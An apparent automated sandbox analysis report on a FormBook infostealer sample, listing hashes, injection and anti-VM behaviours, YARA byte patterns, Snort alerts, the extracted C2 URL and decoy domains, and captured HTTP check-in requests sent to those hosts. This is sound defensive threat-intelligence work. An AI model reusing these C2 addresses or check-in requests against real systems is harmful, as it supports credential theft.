Loading ...

Play interactive tourEdit tour

Analysis Report 4pFzkB6ePK.exe

Overview

General Information

Sample Name:4pFzkB6ePK.exe
Analysis ID:356512
MD5:6dd83e20f43a9bd2e136fcd77131f7e4
SHA1:2d816c160bba20f5e3989af02985118e42a4fe70
SHA256:5babb878615fbf3b56008f4d7becccdb0a316e3eecb95ce99ea2a6c9d5a8a19a
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 4pFzkB6ePK.exe (PID: 6484 cmdline: 'C:\Users\user\Desktop\4pFzkB6ePK.exe' MD5: 6DD83E20F43A9BD2E136FCD77131F7E4)
    • 4pFzkB6ePK.exe (PID: 6880 cmdline: C:\Users\user\Desktop\4pFzkB6ePK.exe MD5: 6DD83E20F43A9BD2E136FCD77131F7E4)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 808 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 6536 cmdline: /c del 'C:\Users\user\Desktop\4pFzkB6ePK.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.ntljcb.com/tub0/"], "decoy": ["playgeazie.com", "blessedmindset.net", "alejofaj.com", "electricbiketechnologes.com", "jmrrealestatellc.com", "alphafathers.com", "trinityhousegoa.com", "trainingrealestateagents.com", "esarpfabrikasi.com", "bookgallary.com", "centralpark-mca.net", "killthemessengermedia.com", "ayderthermal.com", "adsdito.com", "findmy-fmi.info", "1030aponiplace.com", "nachbau.net", "richtig-zuhause-lernen.com", "wuovcoizph.net", "avrplayground.com", "miamiimportca.com", "henrysmassey.com", "truthish.fyi", "serildaspeaks.com", "the-tagteam.com", "s-keer.com", "millersgreenacresfarm.com", "bodytruffle.com", "djtlp.com", "buystockswithcreditcard.com", "estevezcosmetics.com", "fsqlgt.com", "rochellparente.com", "elepope.com", "makiyato.com", "standoniner.com", "onemicandabunchofothers.com", "actranslate.com", "jewelstomorejewels.com", "xn--d1afwajbhp.site", "gogomarketing.xyz", "plietea.club", "carbon-foam.com", "gidanpacouture.com", "covidwatcharizona.com", "truvizi.com", "castleshortage.com", "afromesagroup.com", "specter.one", "mac-compost.com", "spicyfilm.com", "aslanforklift.com", "oka.one", "myjewely.com", "floridashooters.com", "2seamapparel.com", "europeanctosummit.com", "beyond-cultures.com", "cowbex.info", "amandawilsonfamilylaw.com", "whereisdalie.com", "statuniverse.com", "nobotsland.net", "dateatither.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.227758190.0000000002651000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000005.00000002.285256775.0000000001440000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.285256775.0000000001440000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000005.00000002.285256775.0000000001440000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x166a9:$sqlite3step: 68 34 1C 7B E1
      • 0x167bc:$sqlite3step: 68 34 1C 7B E1
      • 0x166d8:$sqlite3text: 68 38 2A 90 C5
      • 0x167fd:$sqlite3text: 68 38 2A 90 C5
      • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
      • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
      00000005.00000002.285193753.0000000001410000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 18 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.4pFzkB6ePK.exe.26d4938.1.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          2.2.4pFzkB6ePK.exe.378cfa0.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            2.2.4pFzkB6ePK.exe.378cfa0.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x120ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x120e42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x1486f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x148a82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x12cb55:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x154795:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x12c641:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x154281:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x12cc57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x154897:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x12cdcf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x154a0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x12185a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x14949a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x12b8bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0x1534fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0x1225d2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x14a212:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x131c47:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x159887:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x132cea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            2.2.4pFzkB6ePK.exe.378cfa0.3.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
            • 0x12eb79:$sqlite3step: 68 34 1C 7B E1
            • 0x12ec8c:$sqlite3step: 68 34 1C 7B E1
            • 0x1567b9:$sqlite3step: 68 34 1C 7B E1
            • 0x1568cc:$sqlite3step: 68 34 1C 7B E1
            • 0x12eba8:$sqlite3text: 68 38 2A 90 C5
            • 0x12eccd:$sqlite3text: 68 38 2A 90 C5
            • 0x1567e8:$sqlite3text: 68 38 2A 90 C5
            • 0x15690d:$sqlite3text: 68 38 2A 90 C5
            • 0x12ebbb:$sqlite3blob: 68 53 D8 7F 8C
            • 0x12ece3:$sqlite3blob: 68 53 D8 7F 8C
            • 0x1567fb:$sqlite3blob: 68 53 D8 7F 8C
            • 0x156923:$sqlite3blob: 68 53 D8 7F 8C
            5.2.4pFzkB6ePK.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
              Click to see the 8 entries

              Sigma Overview

              No Sigma rule has matched

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 2.2.4pFzkB6ePK.exe.378cfa0.3.raw.unpackMalware Configuration Extractor: FormBook {"C2 list": ["www.ntljcb.com/tub0/"], "decoy": ["playgeazie.com", "blessedmindset.net", "alejofaj.com", "electricbiketechnologes.com", "jmrrealestatellc.com", "alphafathers.com", "trinityhousegoa.com", "trainingrealestateagents.com", "esarpfabrikasi.com", "bookgallary.com", "centralpark-mca.net", "killthemessengermedia.com", "ayderthermal.com", "adsdito.com", "findmy-fmi.info", "1030aponiplace.com", "nachbau.net", "richtig-zuhause-lernen.com", "wuovcoizph.net", "avrplayground.com", "miamiimportca.com", "henrysmassey.com", "truthish.fyi", "serildaspeaks.com", "the-tagteam.com", "s-keer.com", "millersgreenacresfarm.com", "bodytruffle.com", "djtlp.com", "buystockswithcreditcard.com", "estevezcosmetics.com", "fsqlgt.com", "rochellparente.com", "elepope.com", "makiyato.com", "standoniner.com", "onemicandabunchofothers.com", "actranslate.com", "jewelstomorejewels.com", "xn--d1afwajbhp.site", "gogomarketing.xyz", "plietea.club", "carbon-foam.com", "gidanpacouture.com", "covidwatcharizona.com", "truvizi.com", "castleshortage.com", "afromesagroup.com", "specter.one", "mac-compost.com", "spicyfilm.com", "aslanforklift.com", "oka.one", "myjewely.com", "floridashooters.com", "2seamapparel.com", "europeanctosummit.com", "beyond-cultures.com", "cowbex.info", "amandawilsonfamilylaw.com", "whereisdalie.com", "statuniverse.com", "nobotsland.net", "dateatither.com"]}
              Multi AV Scanner detection for submitted fileShow sources
              Source: 4pFzkB6ePK.exeVirustotal: Detection: 22%Perma Link
              Source: 4pFzkB6ePK.exeReversingLabs: Detection: 27%
              Yara detected FormBookShow sources
              Source: Yara matchFile source: 00000005.00000002.285256775.0000000001440000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.285193753.0000000001410000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.284397721.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.470152812.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.472397377.0000000000F30000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.472184819.0000000000F00000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.228140943.0000000003659000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 2.2.4pFzkB6ePK.exe.378cfa0.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.4pFzkB6ePK.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.4pFzkB6ePK.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.4pFzkB6ePK.exe.37dcbc0.2.raw.unpack, type: UNPACKEDPE
              Machine Learning detection for sampleShow sources
              Source: 4pFzkB6ePK.exeJoe Sandbox ML: detected
              Source: 5.2.4pFzkB6ePK.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

              Compliance:

              barindex
              Uses 32bit PE filesShow sources
              Source: 4pFzkB6ePK.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
              Source: 4pFzkB6ePK.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Binary contains paths to debug symbolsShow sources
              Source: Binary string: msiexec.pdb source: 4pFzkB6ePK.exe, 00000005.00000002.285616427.0000000001678000.00000004.00000020.sdmp
              Source: Binary string: msiexec.pdbGCTL source: 4pFzkB6ePK.exe, 00000005.00000002.285616427.0000000001678000.00000004.00000020.sdmp
              Source: Binary string: wntdll.pdbUGP source: 4pFzkB6ePK.exe, 00000005.00000002.285884616.0000000001A2F000.00000040.00000001.sdmp, msiexec.exe, 0000000B.00000002.475468589.0000000004BD0000.00000040.00000001.sdmp
              Source: Binary string: wntdll.pdb source: 4pFzkB6ePK.exe, msiexec.exe
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 4x nop then pop esi
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 4x nop then pop edi
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 4x nop then pop edi
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop esi
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 160.153.128.38:80
              Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 160.153.128.38:80
              Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 160.153.128.38:80
              Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49740 -> 194.59.164.91:80
              Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49740 -> 194.59.164.91:80
              Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49740 -> 194.59.164.91:80
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorURLs: www.ntljcb.com/tub0/
              Source: global trafficHTTP traffic detected: GET /tub0/?0T0hlT=cydGkSUU+hbxwnLMCHdxs2HTbhyeOBhf6VDIiN7OyAb+9b2I/6QPcL+NYbrcHhStME+j&OVlT0R=o2JlVT4hT8qhr8ep HTTP/1.1Host: www.nachbau.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /tub0/?0T0hlT=0g3BJlW7sTphQ/5j4Tdr5dYYoDFSx+aDomq4rDoP20bT0mosHTIKHGclLGRJ8AP1BBBd&OVlT0R=o2JlVT4hT8qhr8ep HTTP/1.1Host: www.carbon-foam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /tub0/?0T0hlT=Oc9Sv6ZsHiz1lEkHjT4sUkzXc6kK6TfJoTMn/p3mX09SqIZJtOPjrYy4Z3tQQ5aTicNK&OVlT0R=o2JlVT4hT8qhr8ep HTTP/1.1Host: www.aslanforklift.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /tub0/?0T0hlT=dN2zk3vDrvOSMWpoBKxdiHLfh4G+CBzvqQ9gZV3x5lRoIc3e6NmSOgfKn1bO4v69I6lv&OVlT0R=o2JlVT4hT8qhr8ep HTTP/1.1Host: www.ntljcb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
              Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
              Source: Joe Sandbox ViewASN Name: GODADDY-AMSDE GODADDY-AMSDE
              Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
              Source: C:\Windows\explorer.exeCode function: 6_2_0642A302 getaddrinfo,setsockopt,recv,
              Source: global trafficHTTP traffic detected: GET /tub0/?0T0hlT=cydGkSUU+hbxwnLMCHdxs2HTbhyeOBhf6VDIiN7OyAb+9b2I/6QPcL+NYbrcHhStME+j&OVlT0R=o2JlVT4hT8qhr8ep HTTP/1.1Host: www.nachbau.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /tub0/?0T0hlT=0g3BJlW7sTphQ/5j4Tdr5dYYoDFSx+aDomq4rDoP20bT0mosHTIKHGclLGRJ8AP1BBBd&OVlT0R=o2JlVT4hT8qhr8ep HTTP/1.1Host: www.carbon-foam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /tub0/?0T0hlT=Oc9Sv6ZsHiz1lEkHjT4sUkzXc6kK6TfJoTMn/p3mX09SqIZJtOPjrYy4Z3tQQ5aTicNK&OVlT0R=o2JlVT4hT8qhr8ep HTTP/1.1Host: www.aslanforklift.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /tub0/?0T0hlT=dN2zk3vDrvOSMWpoBKxdiHLfh4G+CBzvqQ9gZV3x5lRoIc3e6NmSOgfKn1bO4v69I6lv&OVlT0R=o2JlVT4hT8qhr8ep HTTP/1.1Host: www.ntljcb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: unknownDNS traffic detected: queries for: www.nachbau.net
              Source: explorer.exe, 00000006.00000000.253352274.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: 4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
              Source: 4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: 4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
              Source: 4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
              Source: explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
              Source: 4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
              Source: 4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
              Source: 4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
              Source: 4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
              Source: 4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
              Source: 4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
              Source: 4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
              Source: 4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
              Source: 4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: 4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: msiexec.exe, 0000000B.00000002.474927487.0000000003244000.00000004.00000020.sdmpString found in binary or memory: http://www.fsqlgt.com/
              Source: msiexec.exe, 0000000B.00000002.474927487.0000000003244000.00000004.00000020.sdmpString found in binary or memory: http://www.fsqlgt.com/T0hlT=nrDRCNaQ3GMZq2PvHSeNd5wOe
              Source: msiexec.exe, 0000000B.00000002.474927487.0000000003244000.00000004.00000020.sdmpString found in binary or memory: http://www.fsqlgt.com/tub0/?0T0hlT=nrDRCNaQ3GMZq2PvHSeNd5wOe
              Source: 4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: 4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: 4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
              Source: 4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: 4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
              Source: 4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
              Source: 4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
              Source: explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
              Source: 4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
              Source: 4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: 4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
              Source: 4pFzkB6ePK.exe, 00000002.00000002.227758190.0000000002651000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
              Source: C:\Windows\explorer.exeCode function: 6_2_06423EB2 OpenClipboard,
              Source: 4pFzkB6ePK.exe, 00000002.00000002.227342464.0000000000A60000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

              E-Banking Fraud:

              barindex
              Yara detected FormBookShow sources
              Source: Yara matchFile source: 00000005.00000002.285256775.0000000001440000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.285193753.0000000001410000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.284397721.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.470152812.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.472397377.0000000000F30000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.472184819.0000000000F00000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.228140943.0000000003659000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 2.2.4pFzkB6ePK.exe.378cfa0.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.4pFzkB6ePK.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.4pFzkB6ePK.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.4pFzkB6ePK.exe.37dcbc0.2.raw.unpack, type: UNPACKEDPE

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 00000005.00000002.285256775.0000000001440000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000005.00000002.285256775.0000000001440000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000005.00000002.285193753.0000000001410000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000005.00000002.285193753.0000000001410000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000005.00000002.284397721.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000005.00000002.284397721.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000B.00000002.470152812.0000000000CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000000B.00000002.470152812.0000000000CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000B.00000002.472397377.0000000000F30000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000000B.00000002.472397377.0000000000F30000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000B.00000002.472184819.0000000000F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000000B.00000002.472184819.0000000000F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000002.228140943.0000000003659000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000002.00000002.228140943.0000000003659000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
